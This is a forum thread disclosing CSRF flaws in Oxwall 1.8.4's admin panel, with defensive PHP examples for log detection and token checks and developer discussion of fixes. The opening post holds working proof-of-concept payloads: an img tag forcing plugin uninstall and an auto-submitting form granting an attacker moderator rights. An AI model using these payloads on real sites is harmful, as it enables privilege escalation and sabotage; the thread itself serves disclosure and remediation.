
Medium Severity CSRF in Admin Panel | Forum

Securify Red Team
Securify Red Team Jun 24 '17
This vulnerability was found in a default installation of Oxwall 1.8.4. No code was modified.


The admin panel of Oxwall has a series of vulnerabilities. We will explain the two important ones that we discovered.


1) Removing and installing plugins

Admin has access to remove or install plugins to create a better experience for the user. Both requests, either to remove or to install a plugin, are done through a GET request. This request does not verify how the call is made.


The prerequisite for this attack is that the admin must be logged into the site. Once that is done, you can send them a link that has HTML code like the following: <img src="[oxwall_url]/lab1/admin/plugins/uninstall/key/[plugin_name]/">


What this does is that, on the attacker's website, img src thinks it is an image so it tries to fetch it. While doing that, it sends a GET request. If the admin is logged in, this GET request will instead delete the installed plugin.


The same thing happens with installing a plugin as well.



Another one: Attacker can add themselves as moderator

Admin has the right to change the role of a user and make them a moderator. This request is a POST request and looks something like this:


POST /lab1/admin/permissions/add-moderator/ HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: [redacted]
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Cookie: __test=[redacted]; f28f354131a7769ac167eb81af76baf4=[redacted]; base_language_id=1; adminToken=[redacted]; ow_login=[redacted]
Connection: close
Upgrade-Insecure-Requests: 1

username=[user's username]



This can result in a CSRF attack. Through an external website, following code can be made:


<form name="addmoderator" action="[oxwallurl]/lab1/admin/permissions/add-moderator/" method="post">
<input type="hidden" name="username" value="[attacker's username]">
</form>
<script>
window.onload = function(){
document.forms['addmoderator'].submit()
}
</script>



When the admin visits the website, the attacker's account is now given Moderator access. A CSRF token is a must in this case.


CVE assigned for this this morning: CVE-2017-9842.


It is recommended that a fix is added as soon as possible and pushed out to all the users.

The Forum post is edited by Securify Red Team Jun 24 '17
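As an added example that is not part of the report and not Oxwall's code, the PHP script below scans combined-format web server access log lines for the two admin endpoints named above (plugin install/uninstall and add-moderator) arriving with a foreign or missing Referer, which is what the forged cross-site requests described in the post look like from the server side. The log lines, the site host community.example, the attacker host, the /lab1 base path and all function names are constructed for this example.

```php
<?php
// Added example (not Oxwall's code): flag admin state-changing requests whose
// Referer is missing or points at another site, as a forged cross-site request
// would. The site host, paths and sample log lines below are constructed.

declare(strict_types=1);

const SITE_HOST = 'community.example';   // assumption: the Oxwall site's own host

// Endpoints from the report; matched anywhere in the path so the base path does not matter.
const WATCHED_PATHS = [
    '#/admin/plugins/(?:install|uninstall)/#',
    '#/admin/permissions/add-moderator/#',
];

// Combined log format: ip - user [time] "METHOD path HTTP/x" status bytes "referer" "user-agent"
const LOG_PATTERN = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "[^"]*"$/';

// Split one log line into the fields the check needs; null if the line does not parse.
function parse_log_line(string $line): ?array
{
    if (!preg_match(LOG_PATTERN, $line, $m)) {
        return null;
    }
    return [
        'ip' => $m[1], 'time' => $m[2], 'method' => $m[3],
        'path' => $m[4], 'status' => (int) $m[5], 'referer' => $m[6],
    ];
}

// Return a verdict for a watched request, or null when nothing looks wrong.
function classify(array $req): ?string
{
    $watched = false;
    foreach (WATCHED_PATHS as $re) {
        if (preg_match($re, $req['path'])) {
            $watched = true;
            break;
        }
    }
    if (!$watched) {
        return null;
    }
    // No Referer at all: lower confidence, browsers and proxies strip it for other reasons too.
    if ($req['referer'] === '' || $req['referer'] === '-') {
        return 'no-referer';
    }
    // Referer from another origin: the request was triggered by a page the site did not serve.
    $host = parse_url($req['referer'], PHP_URL_HOST);
    if (!is_string($host) || strcasecmp($host, SITE_HOST) !== 0) {
        return 'foreign-referer';
    }
    return null;
}

// Run every line through the parser and classifier; collect the hits with their line number.
function scan_log(array $lines): array
{
    $hits = [];
    foreach ($lines as $n => $line) {
        $req = parse_log_line($line);
        if ($req === null) {
            continue;
        }
        $verdict = classify($req);
        if ($verdict !== null) {
            $hits[] = ['line' => $n + 1, 'verdict' => $verdict] + $req;
        }
    }
    return $hits;
}

// Constructed sample: one normal admin page view, the two forged requests from the
// report coming from an attacker-controlled page, one legitimate add-moderator
// submission, and one plugin install with no Referer.
$sample = [
    '10.0.0.5 - - [24/Jun/2017:10:02:11 +0000] "GET /lab1/admin/plugins/ HTTP/1.1" 200 5120 "http://community.example/lab1/admin/" "Mozilla/5.0"',
    '10.0.0.5 - - [24/Jun/2017:10:03:40 +0000] "GET /lab1/admin/plugins/uninstall/key/forum/ HTTP/1.1" 302 0 "http://attacker-site.example/page.html" "Mozilla/5.0"',
    '10.0.0.5 - - [24/Jun/2017:10:03:41 +0000] "POST /lab1/admin/permissions/add-moderator/ HTTP/1.1" 302 0 "http://attacker-site.example/page.html" "Mozilla/5.0"',
    '10.0.0.5 - - [24/Jun/2017:10:05:00 +0000] "POST /lab1/admin/permissions/add-moderator/ HTTP/1.1" 302 0 "http://community.example/lab1/admin/permissions/" "Mozilla/5.0"',
    '10.0.0.9 - - [24/Jun/2017:10:06:13 +0000] "GET /lab1/admin/plugins/install/key/photo/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
];

foreach (scan_log($sample) as $hit) {
    printf("line %d: %-16s %s %s (referer: %s)\n",
        $hit['line'], $hit['verdict'], $hit['method'], $hit['path'], $hit['referer']);
}
```

Run against the constructed sample this reports lines 2 and 3 as foreign-referer and line 5 as no-referer; lines 1 and 4 are same-origin and stay quiet. A Referer check of this kind is useful for hunting in existing logs (a 302 on the uninstall URL from a foreign page means the action most likely went through), but it is not a fix: the Referer is client-controlled and often absent, so the server-side remedy remains a per-session token on every state-changing request and no state changes on GET.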
AppXprt
AppXprt Jun 25 '17
We will have to work together on this one; I don't want to break anything for OxWall users.


I think we could really use an OxWall Dev right about now... :-D


Taking a look into ow_utilities/csrf.php (CSRF Tokens)


Looks like this already has everything needed to generate and verify tokens, so it just needs to be used in these places, I believe.
UTIL_Csrf::generateToken()
UTIL_Csrf::isTokenValid($token)
UTIL_Csrf::getTokenList()

Used for forms as a hidden div:

        $formNameHidden->setValue(UTIL_Csrf::generateToken());

and then is checked for in $this (iteration over elements):

        if ( $this->getElement(self::ELEMENT_CSRF_TOKEN) != null
            && ( !isset($data[self::ELEMENT_CSRF_TOKEN]) || !UTIL_Csrf::isTokenValid($data[self::ELEMENT_CSRF_TOKEN] ))
        ){
            $valid = false;
            OW::getFeedback()->error(OW::getLanguage()->text("base", "invalid_csrf_token_error_message"));
        }



The Forum post is edited by AppXprt Jun 25 '17
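As an added example that is not Oxwall's code and does not call its classes, the pattern AppXprt is pointing at (a per-session random token placed in a hidden form field and checked on submit, the job UTIL_Csrf::generateToken() and UTIL_Csrf::isTokenValid() do in ow_utilities/csrf.php) written out stand-alone in PHP and applied to both actions from the report: add-moderator gets the token check, and plugin uninstall is moved from a GET link to a token-protected POST. The function names, the array-backed $session, the csrf_token field name and the demo data are assumptions made for this example.

```php
<?php
// Added example (not Oxwall's code): a minimal synchronizer-token implementation
// and the two admin actions from the report placed behind it. All names here are
// assumptions for the example; $session stands in for the real PHP session.

declare(strict_types=1);

const CSRF_SESSION_KEY = 'csrf_tokens';
const CSRF_TOKEN_BYTES = 32;
const CSRF_MAX_TOKENS  = 20;   // bound the per-session token list

// Mint a fresh random token and remember it in the session (several tabs may each hold one).
function csrf_generate_token(array &$session): string
{
    $token = bin2hex(random_bytes(CSRF_TOKEN_BYTES));
    $session[CSRF_SESSION_KEY][] = $token;
    $session[CSRF_SESSION_KEY] = array_slice($session[CSRF_SESSION_KEY], -CSRF_MAX_TOKENS);
    return $token;
}

// Validate and consume a token: constant-time comparison, single use.
function csrf_is_token_valid(array &$session, ?string $candidate): bool
{
    if ($candidate === null || !isset($session[CSRF_SESSION_KEY])) {
        return false;
    }
    foreach ($session[CSRF_SESSION_KEY] as $i => $stored) {
        if (hash_equals($stored, $candidate)) {
            unset($session[CSRF_SESSION_KEY][$i]);   // one-shot: a replayed token fails
            return true;
        }
    }
    return false;
}

// Render the add-moderator form with the token in a hidden field (values HTML-escaped).
function render_add_moderator_form(array &$session, string $action): string
{
    $token = htmlspecialchars(csrf_generate_token($session), ENT_QUOTES, 'UTF-8');
    return '<form action="' . htmlspecialchars($action, ENT_QUOTES, 'UTF-8') . '" method="post">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . '<input type="text" name="username"><button type="submit">Add moderator</button></form>';
}

// Guard shared by state-changing admin actions: POST only, valid token required.
// Returns an error string, or null when the request may proceed.
function csrf_guard(string $method, array $post, array &$session): ?string
{
    if ($method !== 'POST') {
        return 'state change must be a POST, not ' . $method;   // an <img src> cannot satisfy this
    }
    if (!csrf_is_token_valid($session, $post['csrf_token'] ?? null)) {
        return 'missing or invalid CSRF token';
    }
    return null;
}

// The add-moderator action from the report, behind the guard.
function handle_add_moderator(string $method, array $post, array &$session, array &$moderators): string
{
    if (($err = csrf_guard($method, $post, $session)) !== null) {
        return 'rejected: ' . $err;
    }
    $moderators[] = $post['username'];
    return 'ok: ' . $post['username'] . ' is now a moderator';
}

// The plugin uninstall action, moved from GET to a token-protected POST.
function handle_uninstall_plugin(string $method, array $post, array &$session, array &$plugins): string
{
    if (($err = csrf_guard($method, $post, $session)) !== null) {
        return 'rejected: ' . $err;
    }
    $key = $post['key'] ?? '';
    $plugins = array_values(array_diff($plugins, [$key]));
    return 'ok: plugin ' . $key . ' removed';
}

// Demo with constructed session and state.
$session    = [];
$moderators = [];
$plugins    = ['forum', 'photo'];

// The two cross-site requests from the report: a GET from an <img>, and a POST without a token.
echo handle_uninstall_plugin('GET', [], $session, $plugins), PHP_EOL;
echo handle_add_moderator('POST', ['username' => 'attacker'], $session, $moderators), PHP_EOL;

// The legitimate flow: render the form (which mints a token), then submit with it.
$html = render_add_moderator_form($session, '/admin/permissions/add-moderator/');
preg_match('/name="csrf_token" value="([0-9a-f]+)"/', $html, $m);
echo handle_add_moderator('POST', ['username' => 'alice', 'csrf_token' => $m[1]], $session, $moderators), PHP_EOL;

// Replaying the same token fails because it was consumed on first use.
echo handle_add_moderator('POST', ['username' => 'alice', 'csrf_token' => $m[1]], $session, $moderators), PHP_EOL;
```

The two forged requests are rejected before any state changes (the first on method, the second on the missing token), the real form submission succeeds, and the replay is refused. The attacker's page cannot read the hidden field because the token is tied to the admin's session and the same-origin policy keeps the rendered form out of a foreign page's reach; that is why a token works where a method change alone would not.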
Securify Red Team
Securify Red Team Jun 25 '17
Quote from Zach Jones: We will have to work together on this one; I don't want to break anything for OxWall users.

I think we could really use an OxWall Dev right about now... :-D

Taking a look into ow_utilities/csrf.php (CSRF Tokens)

Looks like this already has everything needed to generate and verify tokens, so it just needs to be used in these places, I believe.
UTIL_Csrf::generateToken()
UTIL_Csrf::isTokenValid($token)
UTIL_Csrf::getTokenList()

Used for forms as a hidden div:

        $formNameHidden->setValue(UTIL_Csrf::generateToken());

and then is checked for in $this (iteration over elements):

        if ( $this->getElement(self::ELEMENT_CSRF_TOKEN) != null
            && ( !isset($data[self::ELEMENT_CSRF_TOKEN]) || !UTIL_Csrf::isTokenValid($data[self::ELEMENT_CSRF_TOKEN] ))
        ){
            $valid = false;
            OW::getFeedback()->error(OW::getLanguage()->text("base", "invalid_csrf_token_error_message"));
        }

Yup, there are tokens in many places but sadly not on these :( and yes, we need Oxwall devs now.
AppXprt
AppXprt Jun 25 '17

For the first CSRF, we're looking for function: permissions_moders_add_moder (?) in ow_system_plugins/admin/


Hidden div for token may be able to be added to:

ow_system_plugins/admin/views/controllers/permissions_moderators.html

AppXprt
AppXprt Jun 25 '17
CSRF_TOKEN usage and element creation:
ow_core/form.php
AppXprt
AppXprt May 18 '19
BuMp


This and multiple other vulnerabilities need to be addressed; we need to know the future of Oxwall.


I will only disclose issues and vulnerabilities to the Oxwall Team and fellow Active Developers.


Let's all help make this a more secure CMS.

The Forum post is edited by AppXprt May 18 '19
Oxwall Germany Club
Oxwall Germany Jun 11 '19
The issues were reported to the Oxwall development team.